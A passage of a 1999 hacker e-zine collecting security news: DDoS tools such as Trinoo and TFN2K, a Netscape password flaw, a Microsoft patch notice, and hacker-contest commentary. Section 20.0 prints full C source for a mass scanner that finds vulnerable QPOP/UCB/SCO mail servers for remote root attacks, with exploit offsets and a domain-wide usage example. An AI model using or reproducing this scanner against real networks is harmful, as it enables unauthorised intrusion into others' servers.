      http://digital-defiance.hypermart.net/zine.html
      
      Hven ezine      
      http://www.hven.com.ve
      
      @HWA
      
18.0  Digi.no publishes Script Kiddie Rant 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by aka 
      Respected online Norwegian news source Digi.no has
      published an interview with a member of the group
      "Hackers Online Norway" known as Spectom. The
      interview claims that the group is planning to enter the
      stock market and is looking for new members. Members
      must pass a test of knowledge and break into a site for
      membership. (It is unfortunate that a respected
      magazine such as Digi.no would publish what appears to
      be the rantings of a wannabe script kiddie.) 

      Digi.no - Norwegian
      http://www.digi.no/digi98.nsf/pub/dd19991218113200TKW2126192111
      
      Anyone want to send in a translation of this? - Ed
      
      @HWA
      
19.0  w00w00 Con 1999
      ~~~~~~~~~~~~~~~
      
      Contributed by Duro
      
      w00giving99 is off to a great start. In case you haven't heard the w00
      security development team is posting several vulnerabilities along with
      exploit code. It is said that on the year 2k they are going to release their
      best vulnerability along with the code to exploit it. The w00 team is up to #8
      now. Check out http://www.w00w00.org/advisories.html for all of the advisories.
      The w00 team is doing this in the hopes that the vendors will fix the problem.
      In the mean time script kids have fun!
      
      w00w00 Site: http://www.w00w00.org/
      
      @HWA

20.0  pops.c popmail scanner by duro
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      
      /*  POPScan QPOP/UCB/SCO scanner by duro
          duro@dorx.net
      
          takes list of ip's from stdin
          
         The hosts gathered by this scanner are 
         almost 100% vulnerable to a remote
         root attack.  The exploits used to root
         the vulnerable machines can all be found by
         searching bugtraq.  UCB pop is 100% of the
         time vulnerable to the qpop exploit (it's a very
         old version of qpop).  The QPOP version is 
         filtered to make sure that non-vulnerable 
         versions do not show up in the scan.
         Common offsets for the bsd qpop exploit are:
          621, 1500, 500, 300, 900, 0
      
      Example usage:
      
      ./z0ne -o ac.uk | ./pops > ac.uk.log &
      would scan ac.uk for vulnerabilities.
      
      much help from jsbach    
      
      
      */
      
      #include <stdio.h>
      #include <sys/socket.h>
      #include <sys/types.h>
      #include <netinet/in.h>
      #include <signal.h>
      
      int ADMtelnet (u_long, int port);
      char domain[50];
      int NUMCHILDREN = 150, currchilds = 0; /* change numchildren to taste */
      char ip[16];
      int temp1 = 0;
      void scan(char *ip);
      void alrm(void) { return; }
      
      main()
      {
      
         while( (fgets(ip, sizeof(ip), stdin)) != NULL)
                switch(fork()) {
                  case 0: {
                  scan(ip); exit(0);
                  }
                  case -1: {
                    printf("cannot fork so many timez@!@^&\n");
                    exit(0);
                    break;
                    }
                  default:
                      {
                      currchilds++;
                      if (currchilds > NUMCHILDREN)
                        wait(NULL);
                      break;
                      }
                }
      
      }
      
      void scan(char *ip)
      {
      char printip[16];
      struct sockaddr_in addr;
      int sockfd;
      char buf[512];
      
      bzero((struct sockaddr_in *)&addr, sizeof(addr));
      sockfd = socket(AF_INET, SOCK_STREAM, 0);
      
      addr.sin_addr.s_addr = inet_addr(ip);
      addr.sin_port = htons(110);
      addr.sin_family = AF_INET;
      signal(SIGALRM, alrm);
      alarm(5);
      if ( (connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) != -1))
      {
      recv(sockfd, (char *)buf, sizeof(buf), 0);
      
      if ( (strstr(buf, "QPOP") ) != NULL && (strstr(buf, "2.5")) == NULL && (strstr(buf, "krb")) == NULL)
       {
       checkos(ip,1);
      }
      
      if((strstr(buf, "UCB")) != NULL)
      checkos(ip,2);
      
      if((strstr(buf, "SCO")) != NULL)
       {
        strcpy(printip, ip);
        if ((temp1=strrchr(printip, '\n')) != NULL)
         bzero(temp1, 1);
         printf("%s: SCO Unix box running SCO pop.\n",printip);
        } 
      }
      return;
      }
      // }
      
      
      checkos(char *ip, int spl)
      {
      int temp2;
      char printip[16];
      unsigned long temp;
      temp = inet_addr(ip);
      temp2 = ADMtelnet(temp, 23);
        strcpy(printip, ip);
        if ((temp1=strrchr(printip, '\n')) != NULL)
         bzero(temp1, 1);
      
      if ((temp2 == 1)&&(spl==1))
       printf("%s: OpenBSD box running vuln QPOP\n",printip);
      if ((temp2 == 1)&&(spl==2))
       printf("%s: OpenBSD box running vuln UCB pop\n",printip);
      if ((temp2 == 2)&&(spl==1))
       printf("%s: FreeBSD box running vuln QPOP\n",printip);
      if ((temp2 == 2)&&(spl==2))
       printf("%s: FreeBSD box running vuln UCB pop\n",printip);
      if ((temp2 == 3)&&(spl==1))
       printf("%s: BSDi box running vuln QPOP\n",printip);
      if ((temp2 == 3)&&(spl==2))
       printf("%s: BSDi box running vuln UCB pop\n",printip);
      
      }
      
      int ADMtelnet (u_long ip, int port)
      {
        struct sockaddr_in sin;
        u_char buf[4000];
        int dasock, len;
        int longueur = sizeof (struct sockaddr_in);
      
        dasock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);  /* gimme a socket */
      
        sin.sin_family = AF_INET;
        sin.sin_port = htons (port);
        sin.sin_addr.s_addr = ip;
      
        if (connect (dasock, (struct sockaddr *) &sin, longueur) == -1)
          return (-1);
      
        while (1)
          {
            memset (buf, 0, sizeof (buf));
      
            if ((len = read (dasock, buf, 1)) <= 0)
              break;
      
            if (*buf == (unsigned int) 255)
              {
                read (dasock, (buf + 1), 2);
                if (*(buf + 1) == (unsigned int) 253 && !(u_char) * (buf + 2));
                else if ((u_char) * (buf + 1) == (unsigned int) 253)
                  {
                    *(buf + 1) = 252;
                    write (dasock, buf, 3);
                  }
              }
            else
              {
                if (*buf != 0)
                  {
                    bzero (buf, sizeof (buf));
                    read (dasock, buf, sizeof (buf));
                    usleep(40000);
      
              if((strstr(buf, "OpenBSD") != NULL)) 
               return 1;
              if((strstr(buf, "FreeBSD") != NULL)) 
               return 2;
              if((strstr(buf, "BSDI") != NULL)) 
              return 3;
         
                    sleep (1);
                  }
      
              }
      
          }
        return 0;
      }
      
      
      @HWA

21.0  Cypherpunks meeting announcement
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Join us for the first Cypherpunks meeting of the new millennium!
      
      NEXT Meeting: <http://www.freedomfighter.net/cypherpunks/2000/0115.html>
      Meeting Page: <http://www.freedomfighter.net/cypherpunks/physical.html>
      
      SF Bay Area Cypherpunks (80th Chairborne Regiment)
      
      15 Jan 2000 * MEETING PRE-ANNOUNCEMENT
      
      The January 2000 SF Bay Cypherpunks meeting will be on January 15th! 
      
      General Info: 
      
       For those of you who plan ahead: the January 2000 cypherpunks
       physical meeting will be on January 15th, the THIRD SATURDAY of
       January, instead of the usual second Saturday. This will align
       our meeting with the RSA Data Security Conference in San Jose
       the following week (registration starts on 16 Jan). Many of the
       usual cypherpunk suspects from around the planet will be in town.
      
      Location: 
      
       The meeting will be held in San Jose, a few blocks from the RSA
       conference site. Location details to follow.
      
      Time: 
      
       Meeting time is 12-6pm, followed by a group dinner nearby from 6-8pm. 
      
      Speakers: (so far...) 
      
       Cypherpunk Projects: general "Works-in-Progress" session 
       Bruce Schneier (Counterpane) 
       Austin Hill (Zero Knowledge) 
       Paul Holman (Shmoo Group) 
       Adam Shostack (Zero Knowledge)
       Mystery Guest
      
       More Volunteer Speakers are welcome:
       Send us your agenda proposal (one brief paragraph,
       include amount of time needed, e.g. 5/15/30 minutes).
       <mailto:sfbay-cpunks-announce-admin@cryptorights.org?subject=2000-01-15%20agenda%20request>
      
      
      RSA Conference Vendor Expo Free Registration
      
       The show floor will be open January 18th and 19th at the San Jose
       Convention Center. Onsite Expo registration is $50, but it's FREE
       if you register NOW at: <http://www.rsasecurity.com/rsa2000>.
       Also, you can register for the conference or the IBM gala party
       at that site.
       
       
      @HWA
       
22.0  Microsoft security bulletin MS99-046 Windows NT 4.0 SP4 or SP5
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      The following is a Security  Bulletin from the Microsoft Product Security
      Notification Service.
      
      Please do not  reply to this message,  as it was sent  from an unattended
      mailbox.
                          ********************************
      
      Re-release of Microsoft Security Bulletin MS99-046
      --------------------------------------------------
      
      In November, we withdrew a previously released patch that improved the
      randomness of TCP initial sequence numbers in Windows NT 4.0.  The patch was
      withdrawn because it contained the same regression error that was present in
      Windows NT 4.0 SP6.  We have eliminated the regression error and re-released
      the patch.  The security bulletin has been updated and is available at
      http://www.microsoft.com/Security/Bulletins/ms99-046.asp; the FAQ also has
      been updated and is available at
      http://www.microsoft.com/Security/Bulletins/ms99-046faq.asp.
      
      All versions of the original patch were affected by the regression error,
      although the error only manifested itself in certain situations.  When
      applying the new patch, it's not necessary to uninstall the original patch
      first.  Just install the patch as normal.  Here's how to determine which
      patch to apply:
       - If you are running Windows NT 4.0 SP4 or SP5 on an Intel machine, go
         to http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16763 and
         select q243835sp5i.exe.
       - If you are running Windows NT 4.0 SP6 on an Intel machine, go to
         http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16764 and
         select q243835i.exe.
       - If you are running Windows NT 4.0 SP4 or SP5 on an Alpha machine, go
         to http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16763 and
         select q243835sp5a.exe.
       - If you are running Windows NT 4.0 SP6 on an Alpha machine, go
         to http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16764 and
         select q243835a.exe.
      
      We are very sorry for any inconvenience caused by the regression error, and
      will do our best to prevent similar problems in the future.  Regards,
      
      The Microsoft Security Response Team
      
      
      @HWA      
      
23.0  [ISN] Hacker Shootouts?      
      ~~~~~~~~~~~~~~~~~~~~~~~
      
      Forwarded From: darek.milewski@us.pwcglobal.com

      NETWORK WORLD FUSION FOCUS: JIM REAVIS on SECURITY
      Today's Focus: Hacker shootouts?  Not!
      12/10/99
      By Jim Reavis
      
      I personally like the idea of companies sponsoring hacker challenges,
      where a box is set up on the 'Net for ingenious hackers to test their
      skills and win a prize.  These challenges can be educational - for the
      hacker, the sponsor and sometimes for the product vendors as well.  I
      would like to see more hacker challenges, bug bounties and crypto
      algorithm cracking contests.
      
      However, it is completely irresponsible and unbelievable to see hacker
      shootouts that pit one operating system against another.  Such was the
      case in September when PC Week Labs sponsored HackPCWeek.com, where a
      Windows NT server was pitted against a Linux server in a test to find
      which operating system was more secure.  Unfortunately, these types of
      shootouts serve only to obfuscate the real issues of operating system
      security, confuse those trying to learn about the technical differences
      between the operating systems and further polarize the proponents of Linux
      and NT.
      
      Four days after the challenge was initiated, the Linux system was
      compromised by an add-on CGI script with improper security checks - not by
      the core operating system.  In providing an explanation of the hack, PC
      Week Labs revealed that they did not install any of the 21 security
      patches for Red Hat 6; however they did install Service Pack 5 for NT.
      Their reasoning?  It was too difficult to install the individual patches,
      but Service Pack 5 comes in one easy file.
      
      Their perverse reasoning could be described as defining deviancy down -
      systems administrators must be lazy and sloppy so we will be sloppy as
      well.  PC Week Labs does not seem to be aware that service packs on NT are
      not necessarily a systems administrator's paradigm.  The service packs are
      very famous for fixing some things, but breaking others;  consequently,
      many systems administrators are more comfortable staying behind a service
      pack level and utilizing post-SP hotfixes to take a more targeted approach
      to solving problems.
      
      It is clear from PC Week Labs' explanation of their setup rationale that
      service packs are an ideal service management solution - that would be
      news even to many NT advocates.  PC Week Labs is guilty of making unwise
      generalizations about how either of the operating systems are or should be
      securely implemented.
      
      So what did PC Week Labs prove?  As many veterans of the computer security
      industry will say, you cannot prove security, only insecurity.  Providing
      total systems assurance is a complicated process that cannot be emulated
      in a contest.  When it comes to using any computer system for the purpose
      of securing sensitive data, the contribution the technology makes to that
      equation pales in comparison to the contribution the people must make.
      People make the difference in information security, and a solitary
      shootout will do more to establish the competency of the test developers,
      not the products themselves.  Unfortunately, HackPCWeek.com proved very
      little.
      
      What are good hacker challenges to conduct?  Vendors that challenge
      hackers to find flaws in their own products, or very specific algorithms,
      are doing a positive thing.  Microsoft, for one, should be applauded for
      the Windows 2000 beta test site the firm ran on its own.  This is a
      terrific way to get the product out of their developers' and beta testers'
      hands and into those with the talents to hack NT's vulnerabilities.  We
      only wish that this effort was more extensive and that Microsoft would
      have offered nice rewards to successful participants.
      
      Vulnerabilities found on a beta product in a hacker challenge are
      vulnerabilities that won't show up in the released product.  Code-breaking
      challenges like RSA's Data Encryption Standard challenge are enormously
      useful, as they give us concrete data on the amount of processing power
      required to crack a widely used crypto algorithm.  To be sure, vendors use
      marketing spin to claim that their own hacker challenge has proven the
      superiority of their own products, but we all know that vendors are
      supposed to be biased, and we can filter out the noise.  However, contests
      from a presumably unbiased authority need to be much more carefully
      constructed, and need to have objective goals.  Computer magazines have
      done competitive product reviews for a long time, and the accepted
      protocol is to bend over backwards to be fair.  Subjectively patching one
      operating system, but not the other, is troubling and damaging to PC Week
      Labs' credibility.
      
      There are many IT decision makers who want to get to the facts about which
      operating system they should be using now, and in the future.  Facts are
      sometimes hard to come by, and unfortunately, a hacker shootout does not
      provide any facts. A hacker shootout serves only to further polarize the
      respective NT and Linux camps.  Ultimately, HackPCWeek.com appears to be a
      base attempt to capitalize on the Linux-NT debate, without providing
      something useful for IT decision makers.
      
      I personally want to see more hacker challenges. Nothing would please me
      more than to see talented hackers making a living off of these contests,
      while we all learn from the results.  What did we really learn from the
      HackPCWeek.com exercise?  If you are looking to hire a Linux administrator
      and you receive a resume listing PC Week Labs as prior experience - you
      might want to pass.
      
      About the author
      ----------------
      Jim Reavis, the founder of SecurityPortal.com
      (http://securityportal.com/), is an analyst with over
      10 years' experience consulting with Fortune 500 organizations on
      networking and security-related technology projects.
      
      
      Copyright Network World, Inc., 1999
      
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA 
      
24.0  [ISN] 21 yr old secures $53Mil for high-tech startup
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.mercurycenter.com/svtech/news/breaking/merc/docs/004316.htm

      PALO ALTO, Calif. (AP) [12.15.99] -- Angus Davis told his parents not
      to worry when he was thrown out of the prestigious school Phillips
      Academy Andover for hacking into the telephone system.
      
      But even Davis couldn't have predicted that in less than five years he
      would leverage his scofflaw talents to secure $53 million in funding
      for a company trying to combine the power of the World Wide Web with
      the convenience of the telephone.
      
      On Wednesday Davis -- who is barely old enough to pop a bottle of
      champagne -- announced that he and his partners at their company,
      Tellme Networks Inc., have received $47 million in funding from rival
      venture capital firms Benchmark Capital and Kleiner Perkins Caufield &
      Byers. The new round of investment brings the company's total funding
      to $53 million.
      
      ``It's a lot of money,'' said Davis, 21, perched on the bed he has
      built above his desk. ``It's a testament to the importance of our
      team.''
      
      [...]
      
      
      ==
      Some day, on the corporate balance sheet, there will be
      an entry which reads, "Information"; for in most cases
      the information is more valuable than the hardware which
      processes it. -- Adm. Grace Murray Hopper, USN Ret.
      ==
      http://www.dis.org/erehwon/
      
      @HWA      
      
25.0  [ISN] Netscape Security Flaw Revealed
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Forwarded From: "John Q. Public" <tpublic@dimensional.com>

      http://www.zdnet.com/zdnn/stories/news/0,4586,2409537,00.html
      
      By Sharon Cleary, WSJ Interactive Edition
      December 15, 1999 5:50 AM PT
      
      A software-security firm warned that its researchers have found a
      potentially serious security flaw in the e-mail system used by Netscape's
      Web browser.
      
      Reliable Software Technologies, a Sterling, Va., software-security
      company, said Tuesday that two RST engineers needed just eight hours to
      duplicate the mathematical algorithm Netscape Mail uses to scramble users'
      passwords.  The company said the problem affects all current versions of
      Netscape.
      
      Gary McGraw, vice president for corporate technology at RST, said the
      Netscape algorithm was "not an obvious sitting duck -- [the password]
      appears to be scrambled up in a good way, but it's not cryptographically
      strong."  That would allow a determined hacker to reverse-engineer the
      algorithm and figure out the password.
      
      [...]
      
      Officials of Netscape, now a division of Dulles, Va.-based America Online
      Inc. (NYSE: AOL, were concerned by the news but said the unit has no plans
      to change its algorithm. [sic, bad parens]
      
      Chris Saito, the senior director for product management at Netscape, said
      that the option to save a password locally was included for convenience.
      Saito added that Netscape didn't use a stronger encryption algorithm to
      protect passwords so that "computer experts could still access the
      information, in case someone forgot their password."
      
      [snip]
      
      @HWA
      
26.0  [ISN] Cyberterrorism hype
      ~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Forwarded From: Johan.Ingles@janes.co.uk

      
      http://jir.janes.com/sample/jir0525.html
      
      Document created: 21 OCTOBER 1999
      
      Cyberterrorism hype
      
      With the 1990s propensity to dot.com everything that moves, 'hacking' and
      'cyberterrorism' have become subjects of intense media coverage.  Almost
      daily, hitherto unknown security specialists warn of potential
      catastrophes: news that gets picked up by the media and crosses the globe
      with impunity. Johan J Ingles-le Nobel discussed the subject with
      programmers at Slashdot to profile so-called cyberterrorists and examine
      the viability of cyberwarfare. 
      
      Cyberterrorism is a buzzword of 1999. Indeed, with the remarkable growth
      of the Internet, hacking horror stories have reached new heights of
      publicity, leading to a veritable media frenzy. Yet careful examination of
      the issue reveals much of the threat to be unsubstantiated rumour and
      media exaggeration. The exaggeration is understandable, however - these
      technologies underpin our entire society, and what paper can resist
      printing a scoop revealing that banks are being blackmailed with threats
      of attacks on their computers, or that a military satellite has been
      hijacked by hackers?  The idea that an anonymous teenager working alone
      from his bedroom can wreak electronic havoc on the far side of the world
      makes for good press. 
      
      What is a hacker? 
      
      Nothing gets a hacker's back up quicker than someone confusing a hacker
      with cracker. The term 'hacker' refers to an individual who programmes
      enthusiastically (even obsessively), enjoys programming or is especially
      good at programming; a 'cracker' is somebody who breaks into another's
      computer systems or digs into their code (to make a copy-protected
      programme run). Yet the boundaries have become somewhat blurred and the
      popular understanding of these terms is quite wrong: ever since
      Hollywood produced 'Wargames', based on Kevin Mitnick's cracking activities
      (known as 'exploits'), the term 'hacking' has become synonymous with
      unauthorised access into restricted systems - which is 'cracking'. In
      today's world, such activity also includes the deliberate defacement of
      websites. Hackers are quick to point out that there is a code of hacker
      ethics that precludes any profit from the activity - the only motive is
      the activity itself - but they are not naïve: realising the potential for
      misuse, they divide themselves into 'white-hat' hackers (ethical hackers)
      and 'black-hat' hackers (crackers). 
      
      According to hackers, 99% of cracking incidents can be blamed on so-called
      'script-kiddies'. These are usually young people who manage to acquire
      some 'cracking tools' somewhere on the Internet and are keen to try them.
      They choose a 'cool' target (such as NASA, the Pentagon or the White
      House) and launch the tools. Older, more established hackers see them as
      upstarts. Think of a kid walking down a corridor testing doorknobs; whilst
      they are more than capable of defacing websites such as that of the
      Central Intelligence Agency (CIA), their actions are seen as the
      equivalent of putting down a whoopie cushion on the chair of the UN
      Secretary General - juvenile, noisy and somewhat embarrassing, but
      ultimately without real effect. Says Mick Morgan, webmaster to the UK's
      Queen Elizabeth: "I have nightmares about waking up to find graffiti
      (which is all it is) on one of my customer's sites." 
      
      [snip..]
      
      @HWA      
      
27.0  [ISN] The Beijing Hack Attack
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.worldnetdaily.com/bluesky_exnews/19991216_xex_hack_planet.shtml
      
      HONG KONG -- What do blondes, Jack in the Box tacos and 21st century
      cyber-warfare have in common? Everything, apparently, if you're one of
      the elite and stealthy soldiers in Hong Kong Blondes' computer hacking
      universe.
      
      These committed soldiers are locked in mortal combat with the
      government of the People's Republic of China and the transnational
      corporations who profit from dealing with it.
      
      "Human rights are a global concern and we have no second thoughts
      about attacking the multinational corporations who profit off of the
      human rights abuses committed against our Chinese brothers and sisters
      by their own government," says Databyte Cowgirl, one of the leaders of
      the Hong Kong Blondes.
      
      Along with numerous other members of the Hong Kong Blondes, Databyte
      Cowgirl was interviewed by WorldNetDaily over the course of seven
      weeks in July and August of 1999, as well as during the past several
      weeks.
      
      [...]
      
      
      @HWA    
      
28.0  [ISN] Most cybercrime goes unpunished
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.ntsecurity.net/forums/2cents//news.asp?IDF=191

      WINDOWS SECURITY NEWS  12/20/99
      
      Most Cybercrime Goes Unpunished
      
      Monday, December 13, 1999 - According to a recent article by David Noack,
      most cybercrime goes unpunished. And based on the figures presented in
      this report, we have to agree. The report states that of 419 cases of
      alleged computer fraud referred to federal prosecutors in 1998, only 83
      were prosecuted. The remainder were dismissed for lack of evidence. Also
      in 1998, 47 people were convicted of federal computer crimes, and 20 were
      sent to prison; another 10 were found not guilty.
      
      Anyone who has glanced at the ATTRITION.ORG archives realizes that
      these figures are pathetically low compared to the number of computer
      crimes that actually occur every day. The report basically leads us to
      assume most computer criminals are never reported to authorities--and
      perhaps that's because most computer criminals never get caught.
      
                            Links:   APB News
      
      http://www.apbnews.com/newscenter/internetcrime/1999/12/09/cyberlaws1209_01.html?s=snaph
      
      @HWA      
            
29.0  [ISN] Jubilant Zhirinovsky wants to hack Western computers
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Forwarded From: "Vanna P. Rella" <vamprella@vamprella.com>
      
      http://biz.yahoo.com/rf/991219/dy.html
      
      Sunday December 19, 5:19 pm Eastern Time
      
      Jubilant Zhirinovsky wants to hack Western computers
      
      MOSCOW, Dec 20 (Reuters) - Russia's maverick politician Vladimir
      Zhirinovsky, whose ultra-nationalist bloc looks set to do well in a
      parliamentary election, said on Monday he would celebrate by hacking into
      Western computers.
      
      Zhirinovsky's bloc was running at more than eight percent in early results
      compared with pre-election opinion polls which had given him some five
      percent. Asked by Reuters whether he would have a drink to mark his
      party's good showing, he said:
      
      ``No. No way, we Russians don't drink any more. We now work on computers,
      we use computers to send viruses to the West and then we poach your
      money.''
      
      ``We have the best hackers in the world. We do not need to drink or
      smoke...We do not drink, smoke, have drugs and we don't have AIDS, that's
      what you have got in the West.''
      
      Russia is a heavy drinking nation which is struggling to catch up with
      economically-advanced countries on the use of new technologies, such as
      the Internet, but a lack of resources and poor infrastructure confines
      progress to big cities.
      
      Zhirinovsky who has run and done reasonably well in all parliamentary and
      presidential elections since 1991 on a protest vote by lower stratas of
      the Russian society, is one of the most eccentric politicians with an
      acute political sense and bizarre sense of humour.
      
      He has thrown juice at an opponent in a live televised debate, promised to
      wash his boots in the Indian Ocean when Russia expands there and been
      involved in fist-fighting in the State Duma lower chamber of parliament.
      
      But at the same time, he has decided crucial votes in parliament in the
      Kremlin's favour and has developed a well organised party with solid
      assets.
      
      @HWA      
      
30.0  [ISN] Tribe and Trinoo, two new virulent virii
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Forwarded From: "Noonan, Michael D" <mdn@intel.com>

      http://news.cnet.com/news/0-1003-200-1501144.html?tag=st.ne.1002.tgif?st.ne.fd.gif.f
      
      Computer security teams brace for attacks
      By Stephen Shankland
      Staff Writer, CNET News.com
      December 20, 1999, 1:30 p.m. PT
      
      Computer security teams are bracing for holiday attacks by two programs
      that enlist multiple systems to launch coordinated assaults on Web
      servers.
      
      Concern is mounting that the two malicious programs, called Tribe Flood
      Network and Trinoo, will show their colors in coming weeks. Experts fear
      that the holidays are a likely time, because computer administrators on
      vacation will be harder to locate and likely won't be paying as much
      attention to systems under their control.
      
      In addition, some suggest attackers are likely to strike in the midst of
      confusion that people expect with the arrival of the Year 2000 computer
      problem.
      
      Tribe and Trinoo also may be more powerful than previous programs of the
      same kind. The duo, which started appearing in recent months, "are a step
      above what has happened before," according to Dave Dittrich, a computer
      security technician at the University of Washington who wrote analyses of
      the programs.
      
      When installed onto hundreds or thousands of computers, the programs
      simultaneously bombard a select point on the Internet. If the information
      from the attackers comes fast enough, the target computer freezes up.
      
      Flooding attacks such as Tribe and Trinoo are examples of so-called
      denial-of-service attacks, a method that's been around as long as there
      have been networks to inundate. And launching attacks from several
      computers too has been tried before, for example with the "Smurf" attacks
      of last year.
      
      But Tribe and Trinoo give a new level of control to the attacker, and they
      are being improved, Dittrich said.
      
      Moreover, because the origin of the program is obscured, it's hard to
      counteract, said Quinn Peyton of the Computer Emergency Response Team
      (CERT)  at Carnegie Mellon University.
      
      "There are machines now sitting there, prepared to attack somebody else,"
      Peyton said. "Now one person can do a massive denial-of-service."
      
      CERT warns that the Trinoo and Tribe attack tools "appear to be undergoing
      active development, testing and deployment on the Internet."
      
      Tribe Flood Network and Trinoo launch their attacks from a host of
      innocent computers that already have been broken into. Then, on a signal
      from a master computer, the computers simultaneously bombard the victim
      machine with packets of information so fast that it becomes unresponsive.
      At that point, the target computer won't respond to commands and can't be
      taken off the network.
      
      To monitor computer attacks and vulnerabilities, the FBI in 1998 set up an
      office called the National Infrastructure Protection Center (NIPC).
      Although FBI officials did not comment on the Tribe or Trinoo attacks, the
      FBI is holding a news conference tomorrow about Y2K issues, a spokesman
      said.
      
      "There's a lot of paranoia for the Y2K stuff," said David Crawford of the
      Energy Department's Computer Incident Advisory Capability.
      
      CIAC is working hard to prepare a description of how to identify Trinoo
      and Tribe in the next few days. "We're looking for a unique signature that
      will identify these types of attack," he said.
      
      Dittrich might know. He had to respond when 27 computers at his university
      were among 227 that attacked the University of Minnesota during three days
      in August.
      
      "I was having a hard time finding all the people and getting all the
      systems cleaned up," he said, and that was just for a small fraction
      of the systems involved.
      
      "During that time, their network was pretty much unusable for 100,000
      users," Dittrich said. "There isn't much of a defense against these
      denial-of-service attacks."
      
      University of Washington computers also were used for attacks on computers
      in France, Norway and Australia, he said.
      
      The attack software was installed primarily on computers using Sun
      Microsystems' Solaris and Linux--both variations of the Unix operating
      system. To break into those computers, the intruder took advantage of
      known vulnerabilities that allowed him or her to take almost complete
      control of a computer then erase his or her tracks, Dittrich said.
      
      "The core message is that people who have systems on the Internet need to
      know how to deal with them," Dittrich said. "You can't expect your
      computer to be running for years, like a microwave. It's more like a
      really expensive car, where you've got to be taking it in for maintenance
      all the time."
      
      In the attack on the University of Minnesota, 114 of the 227 attacking
      systems were part of the Internet 2, a higher-speed successor to the
      current Internet. Using Internet 2 was important, because its higher-speed
      network can deliver more volleys in the denial-of-service attack.
      
      "Whoever has the bigger pipe wins," Dittrich said.
      
      @HWA      
      
31.0  [ISN] As New Year nears, threat of Net attack program mounts
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      Forwarded From: darek.milewski@us.pwcglobal.com
      
      As New Year nears, threat of Net attack program mounts
      By Stephen Shankland
      Staff Writer, CNET News.com
      December 23, 1999, 4:00 a.m. PT
      URL: http://news.cnet.com/category/0-1003-200-1504709.html
      
      A new and potentially more dangerous version of an Internet attack program
      has been posted just in time for the holidays, and another is on the way.
      
      A new version of a malicious program called the Tribe Flood Network (TFN)
      is more powerful and harder to detect than an earlier version, according
      to experts. And an updated sister program called Trinoo is due to be
      released next week.
      
      Few incidences of their use have been publicly acknowledged, but experts
      are warning sites to prepare against attacks that may coincide with New
      Year's.  Widely anticipated problems owing to the Y2K computer glitch may
      provide cover for other mischief.
      
      The program works like this: A TFN attacker secretly embeds software into
      hundreds of computers. Then, at a selected time, a command is issued that
      prompts the infected computers to swamp a target Web site or server with
      messages in a method of attack called "denial of service." The program
      doesn't damage the "infected" computers or the target, but the sudden
      flood of messages typically knocks out the target system.
      
      Although it's possible for target computers to protect themselves by
      ignoring messages from attacking computers, it's hard to identify which
      computers are attacking--especially when there are hundreds. This
      fundamental vulnerability of networked computers makes protecting against
      denial-of-service attacks extremely difficult.
      
      The existence of TFN was reported earlier this week. The new variant,
      called TFN2K, is potentially more dangerous in that it can enlist machines
      based on both the Windows NT and Unix operating systems to deliver the
      flood of messages, according to Gia Threatte of the Packet Storm Web site,
      which publishes security-related software so system administrators can
      protect against attacks and intrusions.
      
      TFN2K also adds the ability to act on a single command, a stealthier mode
      of operation than the previous version (which required the controller to
      send a password), and encrypts communications, making the infecting
      messages harder to detect, Threatte said.
      
      Further, TFN2K sends decoy information to throw hunters looking for the
      source off the scent.
      
      The purported author of the TFN family, who goes by the name "Mixter,"
      sent a version of TFN2K to Packet Storm. Packet Storm said it also expects
      a new version of Trinoo from Mixter.
      
      With the new software being released now and the "2K" allusion to the new
      year in the name of the program, it appears that a computer attack could
      occur during the holidays.
      
      "I don't really think you're going to see any serious attacks using this
      until New Year's," Threatte said. On Jan. 1, though, people likely will
      try to "cause a little mischief," she said.
      
      Other security watchers concur. The consensus of a Year 2000 bug workshop
      at Carnegie Mellon University's Computer Emergency Response Team was that
      "it is possible that intrusion attempts, viruses and other attacks will be
      focused on the time around 01 January 2000 under cover of Y2K incidents,"
      CERT said.
      
      CERT has warned, "We are receiving reports of intruders compromising
      machines and installing distributed systems used for launching
      packet-flooding denial-of-service attacks." CERT said that attackers
      generally gained unauthorized access to these computers through well-known
      weaknesses, reinforcing the message that system administrators must stay
      up-to-date on keeping their systems secure.
      
      Detection of attacks and their ultimate source isn't easy. Trinoo and the
      TFN family obscure the address of the actual attacker by hiding the person
      in control behind two layers of computers. The attacker lays the
      groundwork by breaking in to several computers, installing master software
      on some and attack software on others. When it's time for the attack, a
      message is sent to the master computers, which in turn is relayed to the
      drone computers that do the attacking by flooding the target with
      "packets" of information.
      
      Compromised computers that can be infected with the attack software have
      become a kind of currency, with attackers trading names and information
      about them over Internet Relay Chat (IRC) discussions, Threatte said.
      
      Threatte defended Packet Storm's philosophy of publishing attack software
      for all to see. "If we don't make it available, there's no way you can
      protect against these things," Threatte said. Sprint, for example,
      recently called upon Packet Storm's information to more quickly fend off
      an intruder.
      
      Other, more dangerous versions of distributed attack software are
      circulating, but Packet Storm doesn't have them, so they're harder to
      detect, Threatte said.
      
      Packet Storm, a five-person group based in Palo Alto, Calif., is no
      stranger to controversy. It's now owned by security consultants
      Kroll-O'Gara after being embroiled in a debate with its former home at
      Harvard University and hacker chronicle site AntiOnline.
      
      Threatte foresees a time when coordinated denial-of-service is more
